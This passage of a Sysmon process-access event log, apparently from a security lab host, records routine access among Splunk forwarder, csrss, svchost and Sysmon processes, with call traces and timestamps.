08:01:45.788","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2169-5F25-0000-0010328B0900}","TargetProcessId":"2456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6249,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2169-5F25-0000-0010328B0900}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2169-5F25-0000-0010328B0900}","TargetProcessId":"2456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6250,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6251,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6252,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6253,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6254,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6255,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
